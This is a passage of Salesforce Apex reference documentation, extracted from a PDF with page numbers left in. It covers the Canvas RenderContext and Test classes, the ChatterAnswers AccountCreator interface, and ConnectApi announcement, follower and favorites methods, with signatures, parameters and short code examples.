This example gets the current custom parameters, adds a new newCustomParam parameter with a value of TESTVALUE, and sets
the current custom parameters.
Canvas.EnvironmentContext env = renderContext.getEnvironmentContext();
// Get current custom params
Map<String, Object> previousParams =
(Map<String, Object>) JSON.deserializeUntyped(env.getParametersAsJSON());
// Add a new custom param
previousParams.put('newCustomParam','TESTVALUE');
// Now replace the parameters with the current parameters plus our new custom param
env.setParametersAsJSON(JSON.serialize(previousParams));
RenderContext Interface
A wrapper interface that is used to retrieve application and environment context information.
Namespace
Canvas
Usage
Use this interface to retrieve application and environment context information for your canvas app. For this interface, you dont need to
create an implementation. Use the default implementation that Salesforce provides.
IN THIS SECTION:
RenderContext Methods
RenderContext Methods
The following are methods for RenderContext.
IN THIS SECTION:
getApplicationContext()
Retrieves the application context information.
getEnvironmentContext()
Retrieves the environment context information.
getApplicationContext()
Retrieves the application context information.
537
Reference
RenderContext Interface
Signature
public Canvas.ApplicationContext getApplicationContext()
Return Value
Type: Canvas.ApplicationContext
Usage
Use this method to get the application context information for your canvas app.
Example
The following example implementation of the CanvasLifecycleHandler onRender() method uses the provided RenderContext to retrieve
the application context information and then checks the namespace, version, and app URL.
public void onRender(Canvas.RenderContext renderContext){
Canvas.ApplicationContext app = renderContext.getApplicationContext();
if (!'MyNamespace'.equals(app.getNamespace())){
// This application is installed, add code as needed
...
}
// Check the application version
Double currentVersion = Double.valueOf(app.getVersion());
if (currentVersion <= 5){
// Add version specific code as needed
...
// Tell the canvas application to operate in deprecated mode
app.setCanvasUrlPath('/canvas?deprecated=true');
}
}
getEnvironmentContext()
Retrieves the environment context information.
Signature
public Canvas.EnvironmentContext getEnvironmentContext()
Return Value
Type: Canvas.EnvironmentContext
Usage
Use this method to get the environment context information for your canvas app.
538
Reference
Test Class
Example
The following example implementation of the CanvasLifecycleHandler onRender() method uses the provided RenderContext to retrieve
the environment context information and then modifies the custom parameters.
public void onRender(Canvas.RenderContext renderContext) {
Canvas.EnvironmentContext env =
renderContext.getEnvironmentContext();
// Retrieve the custom params
Map<String, Object> previousParams = (Map<String, Object>)
JSON.deserializeUntyped(env.getParametersAsJSON());
previousParams.put('param1',1);
previousParams.put('param2',3.14159);
...
// Now, add in some opportunity record IDs
Opportunity[] o = [select id, name from opportunity];
previousParams.put('opportunities',o);
// Now, replace the parameters
env.setParametersAsJSON(JSON.serialize(previousParams));
}
Test Class
Contains methods for automated testing of your Canvas classes.
Namespace
Canvas
Usage
Use this class to test your implementation of Canvas.CanvasLifecycleHandler with mock test data. You can create a test
Canvas.RenderContext with mock application and environment context data and use this data to verify that your CanvasLifecycleHandler
is being invoked correctly.
IN THIS SECTION:
Test Constants
The Test class provides constants that are used as keys when you set mock application and environment context data.
Test Methods
The Test class provides methods for creating test contexts and invoking your CanvasLifecycleHandler with mock data.
Test Constants
The Test class provides constants that are used as keys when you set mock application and environment context data.
539
Reference
Test Class
When you call Canvas.Test.mockRenderContext(Map<String,String>,Map<String,String>), you need to provide maps of key-value pairs
to represent your mock application and environment context data. The Test class provides static constant strings that you can use as
keys for various parts of the application and environment context.
Constant
Description
KEY_CANVAS_URL
KEY_DEVELOPER_NAME
Represents the canvas app developer or API name key in the ApplicationContext.
KEY_DISPLAY_LOCATION
KEY_LOCATION_URL
KEY_NAME
KEY_NAMESPACE
KEY_SUB_LOCATION
KEY_VERSION
Test Methods
The Test class provides methods for creating test contexts and invoking your CanvasLifecycleHandler with mock data.
The following are methods for Test. All are static methods.
IN THIS SECTION:
mockRenderContext(Map<String,String>,Map<String,String>)
Creates and returns a test Canvas.RenderContext based on the provided application and environment context parameters.
testCanvasLifecycle(Canvas.CanvasLifecycleHandler, Canvas.RenderContext)
Calls the canvas test framework to invoke a CanvasLifecycleHandler with the provided RenderContext.
mockRenderContext(Map<String,String>,Map<String,String>)
Creates and returns a test Canvas.RenderContext based on the provided application and environment context parameters.
Signature
public static Canvas.RenderContext mockRenderContext(Map<String,String>
appContextTestValues, Map<String,String> envContextTestValues)
Parameters
appContextTestValues
Type: Map<String,String>
Specifies a map of key-value pairs that provide mock application context data. Use constants that are provided by Canvas.Test as
keys. If null is provided for this parameter, the canvas framework will generate some default mock application context values.
envContextTestValues
Type: Map<String,String>
540
Reference
Test Class
Specifies a map of key-value pairs that provide mock environment context data. Use constants provided by Canvas.Test as keys. If
null is provided for this parameter, the canvas framework will generate some default mock environment context values.
Return Value
Type: Canvas.RenderContext
Usage
Use this method to create a mock Canvas.RenderContext. Use the returned RenderContext in calls to
Canvas.Test.testCanvasLifecycle(Canvas.CanvasLifecycleHandler, Canvas.RenderContext) for testing Canvas.CanvasLifecycleHandler
implementations.
Example
The following example creates maps to represent mock application and environment context data and generates a test
Canvas.RenderContext. This test RenderContext can be used in a call to Canvas.Test.testCanvasLifecycle(Canvas.CanvasLifecycleHandler,
Canvas.RenderContext).
Map<String,String> appValues = new Map<String,String>();
appValues.put(Canvas.Test.KEY_NAMESPACE,'alternateNamespace');
appValues.put(Canvas.Test.KEY_VERSION,'3.0');
Map<String,String> envValues = new Map<String,String>();
envValues.put(Canvas.Test.KEY_DISPLAY_LOCATION,'Chatter');
envValues.put(Canvas.Test.KEY_LOCATION_URL,'https://na1.salesforce.com/_ui/core/chatter/ui/ChatterPage');
Canvas.RenderContext mock = Canvas.Test.mockRenderContext(appValues,envValues);
testCanvasLifecycle(Canvas.CanvasLifecycleHandler, Canvas.RenderContext)
Calls the canvas test framework to invoke a CanvasLifecycleHandler with the provided RenderContext.
Signature
public static Void testCanvasLifecycle(Canvas.CanvasLifecycleHandler
lifecycleHandler,Canvas.RenderContext mockRenderContext)
Parameters
lifecycleHandler
Type: Canvas.CanvasLifecycleHandler
Specifies the CanvasLifecycleHandler implementation that you need to invoke.
mockRenderContext
Type: Canvas.RenderContext
Specifies the RenderContext information that you need to provide to the invoked CanvasLifecycleHandler. If null is provided for
this parameter, the canvas framework will generate and use a default mock RenderContext.
541
Reference
Canvas Exceptions
Return Value
Type: Void
Usage
Use this method to invoke an implementation of Canvas.CanvasLifecycleHandler.onRender(Canvas.RenderContext) with a mock
Canvas.RenderContext that you provide.
Example
The following example creates maps to represent mock application and environment context data and generates a test
Canvas.RenderContext. This test RenderContext is then used to invoke a Canvas.CanvasLifecycleHandler.
// Set some application context data in a Map
Map<String,String> appValues = new Map<String,String>();
appValues.put(Canvas.Test.KEY_NAMESPACE,'alternateNamespace');
appValues.put(Canvas.Test.KEY_VERSION,'3.0');
// Set some environment context data in a MAp
Map<String,String> envValues = new Map<String,String>();
envValues.put(Canvas.Test.KEY_DISPLAY_LOCATION,'Chatter');
envValues.put(Canvas.Test.KEY_LOCATION_URL,'https://na1.salesforce.com/_ui/core/chatter/ui/ChatterPage');
// Create a mock RenderContext using the test application and environment context data
Maps
Canvas.RenderContext mock = Canvas.Test.mockRenderContext(appValues,envValues);
// Set some custom params on the mock RenderContext
mock.getEnvironmentContext().setParametersAsJSON('{\"param1\":1,\"boolParam\":true,\"stringParam\":\"test
string\"}');
// Use the mock RenderContext to invoke a CanvasLifecycleHandler
Canvas.Test.testCanvasLifecycle(handler,mock)
Canvas Exceptions
The Canvas namespace contains exception classes.
All exception classes support built-in methods for returning the error message and exception type. See Exception Class and Built-In
Exceptions.
The Canvas namespace contains this exception:
Exception
Description
Canvas.CanvasRenderException
542
Reference
ChatterAnswers Namespace
Example
The following example implementation of onRender() catches a CanvasException that was thrown because a canvas URL was set
with a string that exceeded the maximum length. A CanvasRenderException is created and thrown to display the error to the user.
public class MyCanvasListener
implements Canvas.CanvasLifecycleHandler {
public void onRender(Canvas.RenderContext renderContext) {
Canvas.ApplicationContext app = renderContext.getApplicationContext();
// Code to generate a URL string that is too long
...
// Try to set the canvas app URL using the invalid URL string
try {
app.setCanvasUrlPath(aUrlPathThatIsTooLong);
} catch (CanvasException e) {
// Display error to user by throwing a new CanvasRenderException
throw new CanvasRenderException(e.getMessage());
}
}
}
See the Force.com Canvas Developers Guide for additional examples that use CanvasRenderException.
ChatterAnswers Namespace
The ChatterAnswers namespace provides an interface for creating Account records.
The following is the interface in the ChatterAnswers namespace.
IN THIS SECTION:
AccountCreator Interface
Creates Account records that will be associated with Chatter Answers users.
AccountCreator Interface
Creates Account records that will be associated with Chatter Answers users.
Namespace
ChatterAnswers
Usage
The ChatterAnswers.AccountCreator is specified in the registrationClassName attribute of a
chatteranswers:registration Visualforce component. This interface is called by Chatter Answers and allows for custom
creation of Account records used for portal users.
543
Reference
AccountCreator Interface
To implement the ChatterAnswers.AccountCreator interface, you must first declare a class with the implements
keyword as follows:
public class ChatterAnswersRegistration implements ChatterAnswers.AccountCreator {
Next, your class must provide an implementation for the following method:
public String createAccount(String firstname, String lastname, Id siteAdminId) {
// Your code here
}
AccountCreator Methods
The following are methods for AccountCreator.
IN THIS SECTION:
createAccount(String, String, Id)
Accepts basic user information and creates an Account record. The implementation of this method returns the account ID.
Signature
public String createAccount(String firstname, String lastname, Id siteAdminId)
Parameters
firstname
Type: String
The first name of the user who is registering.
lastname
Type: String
The last name of the user who is registering.
siteAdminId
Type: ID
The user ID of the Site administrator, used for notification if any exceptions occur.
Return Value
Type: String
544
Reference
ConnectApi Namespace
ConnectApi Namespace
The ConnectApi namespace (also called Chatter in Apex) provides classes for accessing the same data available in Chatter REST API.
Use Chatter in Apex to create custom Chatter experiences in Salesforce.
For information about working with the ConnectApi classes, see Working with Chatter in Apex on page 269.
IN THIS SECTION:
Announcements Class
Access information about announcements. An announcement displays in a designated location in the Salesforce UI until 11:59 p.m.
on its expiration date, unless its deleted or replaced by another announcement.
Chatter Class
Access information about followers and subscriptions for records.
ChatterFavorites Class
Chatter favorites give you easy access to topics, list views, and feed searches.
ChatterFeeds Class
Get, post, and delete feed items, likes, comments, and bookmarks. You can also search feed items, share feed items, and vote on
polls.
545
Reference
ConnectApi Namespace
ChatterGroups Class
Information about groups, such as the groups members, photo, and the groups the specified user is a member of. Add members
to a group, remove members, and change the group photo.
ChatterMessages Class
Access and modify message and conversation data.
ChatterUsers Class
Access information about users, such as followers, subscriptions, files, and groups.
Communities Class
Access general information about communities in your organization.
CommunityModeration Class
Access information about flags feed items and comments in a community. Add and remove one or more flags to and from comments
and feed items. To view a feed containing all flagged feed items and comments, pass ConnectApi.FeedType.Moderation
to the ConnectApi.ChatterFeeds.getFeedItemsFromFeed method.
Datacloud Class
Purchase Data.com contact or company records, and retrieve purchase information.
ManagedTopics Class
Access information about managed topics in a community. Create, delete, and reorder managed topics.
Mentions Class
Access information about mentions. A mention is an @ character followed by a user or group name. When a user or group is
mentioned, they receive a notification.
Organization Class
Access information about an organization.
QuestionAndAnswers Class
Access question and answers suggestions.
RecordDetails Class
Access information about records in your organization.
Records Class
Access information about record motifs, which are small icons used to distinguish record types in the Salesforce UI.
Topics Class
Access information about topics, such as their descriptions, the number of people talking about them, related topics, and information
about groups contributing to the topic. Update a topics name or description, and add and remove topics from records and feed
items.
UserProfiles Class
Access user profile data. The user profile data populates the profile page (also called the Chatter profile page). This data includes
user information (such as address, manager, and phone number), some user capabilities (permissions), and a set of subtab apps,
which are custom tabs on the profile page.
Zones Class
Access information about Chatter Answers zones in your organization. Zones organize questions into logical groups, with each zone
having its own focus and unique questions.
ConnectApi Enums
Enums specific to the ConnectApi namespace.
546
Reference
Announcements Class
ConnectApi Exceptions
The ConnectApi namespace contains exception classes.
Announcements Class
Access information about announcements. An announcement displays in a designated location in the Salesforce UI until 11:59 p.m. on
its expiration date, unless its deleted or replaced by another announcement.
Namespace
ConnectApi
Usage
Use the ConnectApi.Announcements class to get, update, and delete announcements. Use an announcement to highlight
information. Users can discuss, like, and post comments on announcements in the group feed. Group members receive an email
notification when you post an announcement, same as for other posts, depending on their selected group email notification frequency.
Deleting the feed post deletes the announcement.
This image of Salesforce shows an announcement displayed in yellow. Creating an announcement also creates a feed item with the
announcement text, which you can also see in the image.
Announcements Methods
The following are methods for Announcements. All methods are static.
547
Reference
Announcements Class
IN THIS SECTION:
deleteAnnouncement(String, String)
Deletes the specified announcement.
getAnnouncement(String, String)
Gets the specified announcement.
updateAnnouncement(String, String, Datetime)
Updates the expiration date of the specified announcement.
deleteAnnouncement(String, String)
Deletes the specified announcement.
API Version
31.0
Requires Chatter
Yes
Signature
public static void deleteAnnouncement(String communityId, String announcementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
announcementId
Type: String
An announcement ID, which has a prefix of 0BT.
Return Value
Type: Void
Usage
To get a list of announcements in a group (including announcement IDs), call getAnnouncements(String, String) or
getAnnouncements(String, String, Integer, Integer).
To post an announcement to a group, call postAnnouncement(String, String, String, ConnectApi.AnnouncementInput).
getAnnouncement(String, String)
Gets the specified announcement.
548
Reference
Announcements Class
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.Announcement getAnnouncement(String communityId, String
announcementId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
announcementId
Type: String
An announcement ID, which has a prefix of 0BT.
Return Value
Type: ConnectApi.Announcement
Usage
To get a list of announcements in a group (including announcement IDs), call getAnnouncements(String, String) or
getAnnouncements(String, String, Integer, Integer).
To post an announcement to a group, call postAnnouncement(String, String, String, ConnectApi.AnnouncementInput).
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.Announcement udpateAnnouncement(String communityId, String
announcementId, Datetime expirationDate)
549
Reference
Chatter Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
announcementId
Type: String
An announcement ID, which has a prefix of 0BT.
expirationDate
Type: Datetime
The Salesforce UI displays an announcement until 11:59 p.m. on this date unless another announcement is posted first. The Salesforce
UI ignores the time value in the expirationDate. However, you can use the time value to create your own display logic in your
own UI.
Return Value
Type: ConnectApi.Announcement
Usage
To get a list of announcements in a group (including announcement IDs), call getAnnouncements(String, String) or
getAnnouncements(String, String, Integer, Integer).
To post an announcement to a group, call postAnnouncement(String, String, String, ConnectApi.AnnouncementInput).
Chatter Class
Access information about followers and subscriptions for records.
Namespace
ConnectApi
Chatter Methods
The following are methods for Chatter. All methods are static.
IN THIS SECTION:
deleteSubscription(String, String)
Deletes the specified subscription. Use this method to unfollow a record, a user, or a file.
getFollowers(String, String)
Returns the first page of followers for the specified record in the specified community. The page contains the default number of
items.
getFollowers(String, String, Integer, Integer)
Returns the specified page of followers for the specified record.
550
Reference
Chatter Class
getSubscription(String, String)
Returns information about the specified subscription.
deleteSubscription(String, String)
Deletes the specified subscription. Use this method to unfollow a record, a user, or a file.
API Version
28.0
Requires Chatter
Yes
Signature
public static void deleteSubscription(String communityId, String subscriptionId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subscriptionId
Type: String
The ID for a subscription.
Return Value
Type: Void
Usage
Following a user, group, or record is the same as subscribing to a user, group, or record. A follower is the user who followed the
user, group, or record. A subscription is an object describing the relationship between the follower and the user, group, or record they
followed.
To leave a group, call deleteMember(String, String).
SEE ALSO:
Unfollow a Record
Follow a Record
follow(String, String, String)
getFollowers(String, String)
Returns the first page of followers for the specified record in the specified community. The page contains the default number of items.
551
Reference
Chatter Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowerPage getFollowers(String communityId, String recordId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or the keyword me.
Return Value
Type: ConnectApi.FollowerPage
Usage
Following a user, group, or record is the same as subscribing to a user, group, or record. A follower is the user who followed the
user, group, or record. A subscription is an object describing the relationship between the follower and the user, group, or record they
followed.
SEE ALSO:
Follow a Record
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FollowerPage getFollowers(String communityId, String recordId,
Integer pageParam, Integer pageSize)
552
Reference
Chatter Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
recordId
Type: String
The ID for a record or the keyword me.
pageParam
Type: Integer
Specifies the number of the page you want returned. Starts at 0. If you pass in null or 0, the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
Return Value
Type: ConnectApi.FollowerPage
Usage
Following a user, group, or record is the same as subscribing to a user, group, or record. A follower is the user who followed the
user, group, or record. A subscription is an object describing the relationship between the follower and the user, group, or record they
followed.
SEE ALSO:
Follow a Record
getSubscription(String, String)
Returns information about the specified subscription.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.Subscription getSubscription(String communityId, String
subscriptionId)
553
Reference
ChatterFavorites Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subscriptionId
Type: String
The ID for a subscription.
Return Value
Type: ConnectApi.Subscription
Usage
Following a user, group, or record is the same as subscribing to a user, group, or record. A follower is the user who followed the
user, group, or record. A subscription is an object describing the relationship between the follower and the user, group, or record they
followed.
SEE ALSO:
Follow a Record
ChatterFavorites Class
Chatter favorites give you easy access to topics, list views, and feed searches.
Namespace
ConnectApi
Usage
Use Chatter in Apex to get and delete topics, list views, and feed searches that have been added as favorites. Add topics and feed searches
as favorites, and update the last view date of a feed search or list view feed to the current system time.
In this image of Salesforce, Build Issues is a topic, All Accounts is a list view, and United is a feed search:
554
Reference
ChatterFavorites Class
ChatterFavorites Methods
The following are methods for ChatterFavorites. All methods are static.
IN THIS SECTION:
addFavorite(String, String, String)
Adds a feed search favorite for the specified user in the specified community.
addRecordFavorite(String, String, String)
Adds a topic as a favorite.
deleteFavorite(String, String, String)
Deletes the specified favorite.
getFavorite(String, String, String)
Returns a description of the favorite.
getFavorites(String, String)
Returns a list of all favorites for the specified user in the specified community.
getFeedElements(String, String, String)
Returns the first page of feed elements for the specific favorite in the specified community.
getFeedElements(String, String, String, String, Integer, ConnectApi.FeedSortOrder)
Returns the specified page of feed elements for the specified favorite, in the specified community in the specified order.
getFeedElements(String, String, String, Integer, Integer, String, Integer, ConnectApi.FeedSortOrder)
Returns the specified page of feed elements for the specified favorite, in the specified community in the specified order and includes
no more than the specified number of comments per feed element.
getFeedItems(String, String, String)
Returns the first page of feed items for the specific favorite in the specified community. The page contains the default number of
items.
555
Reference
ChatterFavorites Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedFavorite addFavorite(String communityId, String subjectId,
String searchText)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
searchText
Type: String
Specify the text of the search to be saved as a favorite. This method can only create a feed search favorite, not a list view favorite or
a topic.
Return Value
Type: ConnectApi.FeedFavorite
556
Reference
ChatterFavorites Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedFavorite addRecordFavorite(String communityId, String
subjectId, String targetId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
targetId
Type: String
The ID of the topic to add as a favorite.
Return Value
Type: ConnectApi.FeedFavorite
API Version
28.0
Requires Chatter
Yes
Signature
public static Void deleteFavorite(String communityId, String subjectId, String
favoriteId)
557
Reference
ChatterFavorites Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
Return Value
Type: Void
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedFavorite getFavorite(String communityId, String subjectId,
String favoriteId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
558
Reference
ChatterFavorites Class
Return Value
Type: ConnectApi.FeedFavorite
getFavorites(String, String)
Returns a list of all favorites for the specified user in the specified community.
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedFavorites getFavorites(String communityId, String subjectId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
Return Value
Type: ConnectApi.FeedFavorites
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElements(String communityId, String
subjectId, String favoriteId)
559
Reference
ChatterFavorites Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedElements(String, String, String, ConnectApi.FeedElementPage)
API Version
31.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedElementPage getFeedElements(String communityId, String
subjectId, String favoriteId, String pageParam, Integer pageSize,
ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
560
Reference
ChatterFavorites Class
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedElements(String, String, String, String, Integer, ConnectApi.FeedSortOrder, ConnectApi.FeedElementPage)
API Version
31.0
Requires Chatter
Yes
561
Reference
ChatterFavorites Class
Signature
public static ConnectApi.FeedElementPage getFeedElements(String communityId, String
subjectId, String favoriteId, Integer recentCommentCount, Integer elementsPerBundle,
String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedElementPage
562
Reference
ChatterFavorites Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedElements(String, String, String, Integer, Integer, String, Integer, ConnectApi.FeedSortOrder,
ConnectApi.FeedElementPage)
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElements(String, String, String).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItems(String communityId, String subjectId,
String favoriteId)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
Return Value
Type: ConnectApi.FeedItemPage
563
Reference
ChatterFavorites Class
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedItems(String, String, String, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
28.031.0
Important: In version 32.0 and later, use getFeedElements(String, String, String, String, Integer, ConnectApi.FeedSortOrder).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItems(String communityId, String subjectId,
String favoriteId, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder
sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
564
Reference
ChatterFavorites Class
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedItems(String, String, String, String, Integer, FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
API Version
29.031.0
Important: In version 32.0 and later, use getFeedElements(String, String, String, Integer, Integer, String, Integer,
ConnectApi.FeedSortOrder).
Requires Chatter
Yes
Signature
public static ConnectApi.FeedItemPage getFeedItems(String communityId, String subjectId,
String favoriteId, Integer recentCommentCount, String pageParam, Integer pageSize,
FeedSortOrder sortParam)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
565
Reference
ChatterFavorites Class
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed item. The default value is 3.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed items per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed item, or by the most recently modified feed item. If you pass in null,
the default value CreatedDateDesc is used.
Return Value
Type: ConnectApi.FeedItemPage
Usage
To test code that uses this method, use the matching set test method (prefix the method name with setTest). You must use the set
test method with the same parameters or the code throws an exception.
SEE ALSO:
setTestGetFeedItems(String, String, String, Integer, String, Integer, FeedSortOrder, ConnectApi.FeedItemPage)
Testing ConnectApi Code
566
Reference
ChatterFavorites Class
API Version
28.0
Requires Chatter
Yes
Signature
public static ConnectApi.FeedFavorite updateFavorite(String communityId, String
subjectId, String favoriteId, Boolean updateLastViewDate)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
Specify the ID for the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
updateLastViewDate
Type: Boolean
Specify whether to update the last view date of the specified favorite to the current system time (true) or not (false).
Return Value
Type: ConnectApi.FeedFavorite
API Version
31.0
567
Reference
ChatterFavorites Class
Signature
public static Void setTestGetFeedElements(String communityId, String subjectId, String
favoriteId, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElements(String, String, String)
Testing ConnectApi Code
API Version
31.0
Signature
public static Void setTestGetFeedElements(String communityId, String subjectId, String
favoriteId, String pageParam, Integer pageSize, ConnectApi.FeedSortOrder sortParam,
ConnectApi.FeedElementPage result)
568
Reference
ChatterFavorites Class
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
The object containing test data.
Return Value
Type: Void
SEE ALSO:
getFeedElements(String, String, String, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
569
Reference
ChatterFavorites Class
API Version
31.0
Signature
public static Void setTestGetFeedElements(String communityId, String subjectId, String
favoriteId, Integer recentCommentCount, Integer elementsPerClump, String pageParam,
Integer pageSize, ConnectApi.FeedSortOrder sortParam, ConnectApi.FeedElementPage result)
Parameters
communityId
Type: String
Use either the ID for a community, internal, or null.
subjectId
Type: String
The ID of the context user or the alias me.
favoriteId
Type: String
The ID of a favorite.
recentCommentCount
Type: Integer
The maximum number of comments to return with each feed element. The default value is 3.
elementsPerBundle
Type: Integer
The maximum number of feed elements per bundle. The default and maximum value is 10.
pageParam
Type: String
The page token to use to view the page. Page tokens are returned as part of the response class, for example, currentPageToken
or nextPageToken. If you pass in null the first page is returned.
pageSize
Type: Integer
Specifies the number of feed elements per page. Valid values are between 1 and 100. If you pass in null, the default size is 25.
sortParam
Type: ConnectApi.FeedSortOrder
Values are:
CreatedDateDescSorts by most recent creation date.
LastModifiedDateDescSorts by most recent activity.
Sorts the returned feed by the most recently created feed element, or by the most recently modified feed element. If you pass in
null, the default value CreatedDateDesc is used.
result
Type: ConnectApi.FeedElementPage
570
Reference
ChatterFavorites Class
Return Value
Type: Void
SEE ALSO:
getFeedElements(String, String, String, Integer, Integer, String, Integer, ConnectApi.FeedSortOrder)
Testing ConnectApi Code
API Version
28.031.0
Signature
public static Void setTestGetFeedItems(String communityId, String subjectId, String
favoriteId, ConnectApi.FeedItemPage result)
Parameters
communityId
Type: String
